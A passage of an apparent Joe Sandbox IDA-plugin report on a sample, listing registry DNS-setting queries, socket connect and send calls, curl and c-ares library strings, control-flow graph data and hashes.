                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 002DAA4C
                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 002DAA97
                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 002DAAE9
                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 002DAB30
                                          • RegCloseKey.KERNELBASE(?), ref: 002DAB6A
                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 002DAB82
                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 002DAC46
                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 002DAD0A
                                          • RegEnumKeyExA.KERNELBASE ref: 002DAD8D
                                          • RegCloseKey.KERNELBASE(?), ref: 002DADD9
                                          • RegEnumKeyExA.KERNELBASE ref: 002DAE08
                                          • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 002DAE2A
                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 002DAE54
                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 002DAF63
                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 002DAFB2
                                          • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 002DB072
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: QueryValue$Open$CloseEnum
                                          • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                          • API String ID: 4217438148-1047472027
                                          • Opcode ID: 2d0676f475c194e7fafb925b788143ba10df479853f07f3b89d43c07ae4463b1
                                          • Instruction ID: a8cc8c54469051019affce4ec5b909ec291cf444b2b0da8c82138b31d35acb41
                                          • Opcode Fuzzy Hash: 2d0676f475c194e7fafb925b788143ba10df479853f07f3b89d43c07ae4463b1
                                          • Instruction Fuzzy Hash: 0972CFB1618302ABE7109F24CC81F6B7BE8AF85704F145829F9859B391E775EC54CBA3
                                          APIs
                                          • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0025A832
                                          Strings
                                          • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0025AD0A
                                          • Could not set TCP_NODELAY: %s, xrefs: 0025A871
                                          • Trying %s:%d..., xrefs: 0025A7C2, 0025A7DE
                                          • Local port: %hu, xrefs: 0025AF28
                                          • Couldn't bind to '%s' with errno %d: %s, xrefs: 0025AE1F
                                          • @, xrefs: 0025AC42
                                          • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0025A6CE
                                          • Trying [%s]:%d..., xrefs: 0025A689
                                          • Local Interface %s is ip %s using address family %i, xrefs: 0025AE60
                                          • cf-socket.c, xrefs: 0025A5CD, 0025A735
                                          • Bind to local port %d failed, trying next, xrefs: 0025AFE5
                                          • bind failed with errno %d: %s, xrefs: 0025B080
                                          • Name '%s' family %i resolved to '%s' family %i, xrefs: 0025ADAC
                                          • @, xrefs: 0025A8F4
                                          • cf_socket_open() -> %d, fd=%d, xrefs: 0025A796
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: setsockopt
                                          • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                          • API String ID: 3981526788-2373386790
                                          • Opcode ID: 88193f78b5f6bcd17a1288ed4c725298d6af85aa707f9ce14c74d1838680de46
                                          • Instruction ID: 19bc5ccccca5d36ee467abb15e1499931ede5efc16c5294b8c31784be8904a51
                                          • Opcode Fuzzy Hash: 88193f78b5f6bcd17a1288ed4c725298d6af85aa707f9ce14c74d1838680de46
                                          • Instruction Fuzzy Hash: 78622670514342ABE720CF14C846BABB7F4BF95315F044A29FD8897292E771E869CB93

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 944 2e9740-2e975b 945 2e975d-2e9768 call 2e78a0 944->945 946 2e9780-2e9782 944->946 954 2e976e-2e9770 945->954 955 2e99bb-2e99c0 945->955 948 2e9788-2e97a0 call 5a8e00 call 2e78a0 946->948 949 2e9914-2e994e call 5a8b70 RegOpenKeyExA 946->949 948->955 960 2e97a6-2e97c5 948->960 958 2e995a-2e9992 RegQueryValueExA RegCloseKey call 5a8b98 949->958 959 2e9950-2e9955 949->959 954->960 961 2e9772-2e977e 954->961 962 2e9a0c-2e9a15 955->962 974 2e9997-2e99b5 call 2e78a0 958->974 959->962 967 2e9827-2e9833 960->967 968 2e97c7-2e97e0 960->968 961->948 970 2e985f-2e9872 call 2e5ca0 967->970 971 2e9835-2e985c call 2de2b0 * 2 967->971 972 2e97f6-2e9809 968->972 973 2e97e2-2e97f3 call 5a8b50 968->973 985 2e9878-2e987d call 2e77b0 970->985 986 2e99f0 970->986 971->970 972->967 984 2e980b-2e9810 972->984 973->972 974->955 974->960 984->967 989 2e9812-2e9822 984->989 993 2e9882-2e9889 985->993 988 2e99f5-2e99fb call 2e5d00 986->988 999 2e99fe-2e9a09 988->999 989->962 993->988 994 2e988f-2e989b call 2d4fe0 993->994 994->986 1002 2e98a1-2e98c3 call 5a8b50 call 2e78a0 994->1002 999->962 1008 2e98c9-2e98db call 2de2d0 1002->1008 1009 2e99c2-2e99ed call 2de2b0 * 2 1002->1009 1008->1009 1014 2e98e1-2e98f0 call 2de2d0 1008->1014 1009->986 1014->1009 1020 2e98f6-2e9905 call 2e63f0 1014->1020 1024 2e990b-2e990f 1020->1024 1025 2e9f66-2e9f7f call 2e5d00 1020->1025 1026 2e9a3f-2e9a5a call 2e6740 call 2e63f0 1024->1026 1025->999 1026->1025 1033 2e9a60-2e9a6e call 2e6d60 1026->1033 1036 2e9a1f-2e9a39 call 2e6840 call 2e63f0 1033->1036 1037 2e9a70-2e9a94 call 2e6200 call 2e67e0 call 2e6320 1033->1037 1036->1025 1036->1026 1048 2e9a16-2e9a19 1037->1048 1049 2e9a96-2e9ac6 call 2dd120 1037->1049 1048->1036 1050 2e9fc1 1048->1050 1055 2e9ac8-2e9adb call 2dd120 1049->1055 1056 2e9ae1-2e9af7 call 2dd190 1049->1056 1053 2e9fc5-2e9ffd call 2e5d00 call 2de2b0 * 2 1050->1053 1053->999 1055->1036 1055->1056 1056->1036 1063 2e9afd-2e9b09 call 2d4fe0 1056->1063 1063->1050 1068 2e9b0f-2e9b29 call 2de730 1063->1068 1073 2e9b2f-2e9b3a call 2e78a0 1068->1073 1074 2e9f84-2e9f88 1068->1074 1073->1074 1081 2e9b40-2e9b54 call 2de760 1073->1081 1076 2e9f95-2e9f99 1074->1076 1078 2e9f9b-2e9f9e 1076->1078 1079 2e9fa0-2e9fb6 call 2debf0 * 2 1076->1079 1078->1050 1078->1079 1091 2e9fb7-2e9fbe 1079->1091 1087 2e9f8a-2e9f92 1081->1087 1088 2e9b5a-2e9b6e call 2de730 1081->1088 1087->1076 1094 2e9b8c-2e9b97 call 2e63f0 1088->1094 1095 2e9b70-2ea004 1088->1095 1091->1050 1103 2e9b9d-2e9bbf call 2e6740 call 2e63f0 1094->1103 1104 2e9c9a-2e9cab call 2dea00 1094->1104 1100 2ea015-2ea01d 1095->1100 1101 2ea01f-2ea022 1100->1101 1102 2ea024-2ea045 call 2debf0 * 2 1100->1102 1101->1053 1101->1102 1102->1053 1103->1104 1121 2e9bc5-2e9bda call 2e6d60 1103->1121 1113 2e9f31-2e9f35 1104->1113 1114 2e9cb1-2e9ccd call 2dea00 call 2de960 1104->1114 1116 2e9f37-2e9f3a 1113->1116 1117 2e9f40-2e9f61 call 2debf0 * 2 1113->1117 1130 2e9ccf 1114->1130 1131 2e9cfd-2e9d0e call 2de960 1114->1131 1116->1036 1116->1117 1117->1036 1121->1104 1133 2e9be0-2e9bf4 call 2e6200 call 2e67e0 1121->1133 1134 2e9cd1-2e9cec call 2de9f0 call 2de4a0 1130->1134 1142 2e9d53-2e9d55 1131->1142 1143 2e9d10 1131->1143 1133->1104 1149 2e9bfa-2e9c0b call 2e6320 1133->1149 1155 2e9cee-2e9cfb call 2de9d0 1134->1155 1156 2e9d47-2e9d51 1134->1156 1146 2e9e69-2e9e8e call 2dea40 call 2de440 1142->1146 1147 2e9d12-2e9d2d call 2de9f0 call 2de4a0 1143->1147 1172 2e9e94-2e9eaa call 2de3c0 1146->1172 1173 2e9e90-2e9e92 1146->1173 1169 2e9d2f-2e9d3c call 2de9d0 1147->1169 1170 2e9d5a-2e9d6f call 2de960 1147->1170 1164 2e9b75-2e9b86 call 2dea00 1149->1164 1165 2e9c11-2e9c1c call 2e7b70 1149->1165 1155->1131 1155->1134 1161 2e9dca-2e9ddb call 2de960 1156->1161 1182 2e9e2e-2e9e36 1161->1182 1183 2e9ddd-2e9ddf 1161->1183 1164->1094 1185 2e9f2d 1164->1185 1165->1094 1189 2e9c22-2e9c33 call 2de960 1165->1189 1169->1147 1198 2e9d3e-2e9d42 1169->1198 1201 2e9dc2 1170->1201 1202 2e9d71-2e9d73 1170->1202 1194 2ea04a-2ea04c 1172->1194 1195 2e9eb0-2e9eb1 1172->1195 1179 2e9eb3-2e9ec4 call 2de9c0 1173->1179 1179->1036 1204 2e9eca-2e9ed0 1179->1204 1191 2e9e3d-2e9e5b call 2debf0 * 2 1182->1191 1192 2e9e38-2e9e3b 1182->1192 1186 2e9e06-2e9e21 call 2de9f0 call 2de4a0 1183->1186 1185->1113 1227 2e9e23-2e9e2c call 2deac0 1186->1227 1228 2e9de1-2e9dee call 2dec80 1186->1228 1214 2e9c66-2e9c75 call 2e78a0 1189->1214 1215 2e9c35 1189->1215 1193 2e9e5e-2e9e67 1191->1193 1192->1191 1192->1193 1193->1146 1193->1179 1207 2ea04e-2ea051 1194->1207 1208 2ea057-2ea070 call 2debf0 * 2 1194->1208 1195->1179 1198->1146 1201->1161 1209 2e9d9a-2e9db5 call 2de9f0 call 2de4a0 1202->1209 1212 2e9ee5-2e9ef2 call 2de9f0 1204->1212 1207->1050 1207->1208 1208->1091 1242 2e9db7-2e9dc0 call 2deac0 1209->1242 1243 2e9d75-2e9d82 call 2dec80 1209->1243 1212->1036 1236 2e9ef8-2e9f0e call 2de440 1212->1236 1232 2e9c7b-2e9c8f call 2de7c0 1214->1232 1233 2ea011 1214->1233 1222 2e9c37-2e9c51 call 2de9f0 1215->1222 1222->1094 1258 2e9c57-2e9c64 call 2de9d0 1222->1258 1246 2e9df1-2e9e04 call 2de960 1227->1246 1228->1246 1232->1094 1253 2e9c95-2ea00e 1232->1253 1233->1100 1256 2e9ed2-2e9edf call 2de9e0 1236->1256 1257 2e9f10-2e9f26 call 2de3c0 1236->1257 1259 2e9d85-2e9d98 call 2de960 1242->1259 1243->1259 1246->1182 1246->1186 1253->1233 1256->1036 1256->1212 1257->1256 1270 2e9f28 1257->1270 1258->1214 1258->1222 1259->1201 1259->1209 1270->1050
                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 002E9946
                                          • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 002E9974
                                          • RegCloseKey.KERNELBASE(?), ref: 002E998B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                          • API String ID: 3677997916-4129964100
                                          • Opcode ID: 68e4a4981e4ee0228c0cb45bd89dacf3afb91cbc84f342f8537aee244f4012bb
                                          • Instruction ID: 649de85b5d754df3a61470565922090673c4f7a4b7381679300341fb80af461e
                                          • Opcode Fuzzy Hash: 68e4a4981e4ee0228c0cb45bd89dacf3afb91cbc84f342f8537aee244f4012bb
                                          • Instruction Fuzzy Hash: 2A32D7B19642426BEB10AF22EC42A5B76D4AF54308F494436FD099A363F731ED74CB93

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1365 258b50-258b69 1366 258be6 1365->1366 1367 258b6b-258b74 1365->1367 1368 258be9 1366->1368 1369 258b76-258b8d 1367->1369 1370 258beb-258bf2 1367->1370 1368->1370 1371 258bf3-258bfe call 25a550 1369->1371 1372 258b8f-258ba7 call 236e40 1369->1372 1377 258de4-258def 1371->1377 1378 258c04-258c08 1371->1378 1379 258bad-258baf 1372->1379 1380 258cd9-258d16 SleepEx 1372->1380 1383 258df5-258e19 call 25a150 1377->1383 1384 258e8c-258e95 1377->1384 1381 258dbd-258dc3 1378->1381 1382 258c0e-258c1d 1378->1382 1385 258bb5-258bb9 1379->1385 1386 258ca6-258cb0 1379->1386 1395 258d22 1380->1395 1396 258d18-258d20 1380->1396 1381->1368 1390 258c35-258c48 call 25a150 1382->1390 1391 258c1f-258c34 connect 1382->1391 1420 258e88 1383->1420 1421 258e1b-258e26 1383->1421 1388 258e97-258e9c 1384->1388 1389 258f00-258f06 1384->1389 1385->1370 1394 258bbb-258bc2 1385->1394 1386->1380 1392 258cb2-258cb8 1386->1392 1397 258edf-258eef call 2278b0 1388->1397 1398 258e9e-258eb6 call 232a00 1388->1398 1389->1370 1419 258c4d-258c4f 1390->1419 1391->1390 1399 258ddc-258dde 1392->1399 1400 258cbe-258cd4 call 25b180 1392->1400 1394->1370 1402 258bc4-258bcc 1394->1402 1406 258d26-258d39 1395->1406 1396->1406 1423 258ef2-258efc 1397->1423 1398->1397 1425 258eb8-258edd call 233410 * 2 1398->1425 1399->1368 1399->1377 1400->1377 1403 258bd4-258bda 1402->1403 1404 258bce-258bd2 1402->1404 1403->1370 1411 258bdc-258be1 1403->1411 1404->1370 1404->1403 1414 258d43-258d61 call 23d8c0 call 25a150 1406->1414 1415 258d3b-258d3d 1406->1415 1422 258dac-258db8 call 2650a0 1411->1422 1444 258d66-258d74 1414->1444 1415->1399 1415->1414 1426 258c51-258c58 1419->1426 1427 258c8e-258c93 1419->1427 1420->1384 1428 258e2e-258e85 call 23d090 call 264fd0 1421->1428 1429 258e28-258e2c 1421->1429 1422->1370 1423->1389 1425->1423 1426->1427 1434 258c5a-258c62 1426->1434 1437 258c99-258c9f 1427->1437 1438 258dc8-258dd9 call 25b100 1427->1438 1428->1420 1429->1420 1429->1428 1440 258c64-258c68 1434->1440 1441 258c6a-258c70 1434->1441 1437->1386 1438->1399 1440->1427 1440->1441 1441->1427 1446 258c72-258c8b call 2650a0 1441->1446 1444->1370 1449 258d7a-258d81 1444->1449 1446->1427 1449->1370 1453 258d87-258d8f 1449->1453 1454 258d91-258d95 1453->1454 1455 258d9b-258da1 1453->1455 1454->1370 1454->1455 1455->1370 1458 258da7 1455->1458 1458->1422
                                          APIs
                                          • connect.WS2_32(?,?,00000001), ref: 00258C2F
                                          • SleepEx.KERNELBASE(00000000,00000000), ref: 00258CF3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: Sleepconnect
                                          • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                          • API String ID: 238548546-879669977
                                          • Opcode ID: e1d0f1cee82d7344c47591cd8ee75bd0d30d60987b810b782a585751ada9278c
                                          • Instruction ID: 27c1746146cc3310fe17d5e9837dfa35934d2658c1dac159801868a98f96fce7
                                          • Opcode Fuzzy Hash: e1d0f1cee82d7344c47591cd8ee75bd0d30d60987b810b782a585751ada9278c
                                          • Instruction Fuzzy Hash: 75B1C070614706AFE710CF24C885B66B7E4AF45319F048529FC59AB2D2DBB0EC6CCB65

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1459 222f17-222f8c call 6c2270 call 6c2660 1464 2231c9-2231cd 1459->1464 1465 2231d3-2231d6 1464->1465 1466 222f91-222ff4 call 221619 RegOpenKeyExA 1464->1466 1469 2231c5 1466->1469 1470 222ffa-22300b 1466->1470 1469->1464 1471 22315c-2231ac RegEnumKeyExA 1470->1471 1472 2231b2-2231c2 1471->1472 1473 223010-223083 call 221619 RegOpenKeyExA 1471->1473 1472->1469 1477 223089-2230d4 RegQueryValueExA 1473->1477 1478 22314e-223152 1473->1478 1479 2230d6-223137 call 6c2540 call 6c25d0 call 6c2660 call 6c2470 call 6c2660 call 6c09d0 1477->1479 1480 22313b-22314b RegCloseKey 1477->1480 1478->1471 1479->1480 1480->1478
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: EnumOpen
                                          • String ID: *'r
                                          • API String ID: 3231578192-2924853329
                                          • Opcode ID: 582b47b39d326eae39ccb7b3da3c5873517c183b53cac9179e81de0373653585
                                          • Instruction ID: de3010c709b97c78aca61a4a9e26e71f695f816e0a742e0d6587b378a530ca13
                                          • Opcode Fuzzy Hash: 582b47b39d326eae39ccb7b3da3c5873517c183b53cac9179e81de0373653585
                                          • Instruction Fuzzy Hash: 8D71B5B490431A9FDB40DF69D584B9EBBF0FF84308F10896DE89897311D7749A898F92

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1493 2276a0-2276be 1494 2276c0-2276c7 1493->1494 1495 2276e6-2276f2 send 1493->1495 1494->1495 1496 2276c9-2276d1 1494->1496 1497 2276f4-227709 call 2272a0 1495->1497 1498 22775e-227762 1495->1498 1499 2276d3-2276e4 1496->1499 1500 22770b-227759 call 2272a0 call 22cb20 call 5a8c50 1496->1500 1497->1498 1499->1497 1500->1498
                                          APIs
                                          • send.WS2_32(multi.c,?,?,?,N=",00000000,?,?,002307BF), ref: 002276EB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: send
                                          • String ID: LIMIT %s:%d %s reached memlimit$N="$SEND %s:%d send(%lu) = %ld$multi.c$send
                                          • API String ID: 2809346765-302867807
                                          • Opcode ID: 3a3c787fe7849265dd518dd3119774e400821d2f497e18a68515f0cdb6cd97e9
                                          • Instruction ID: e7471ebb78c66fd747e3a09093ebd45439c9e3e3186f25b5155740be2741cdf6
                                          • Opcode Fuzzy Hash: 3a3c787fe7849265dd518dd3119774e400821d2f497e18a68515f0cdb6cd97e9
                                          • Instruction Fuzzy Hash: 52110AF1A2D7357BE1209F94BC8AD3B7B5CEBC2B28F040508FC0827252E569DD2486B1

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
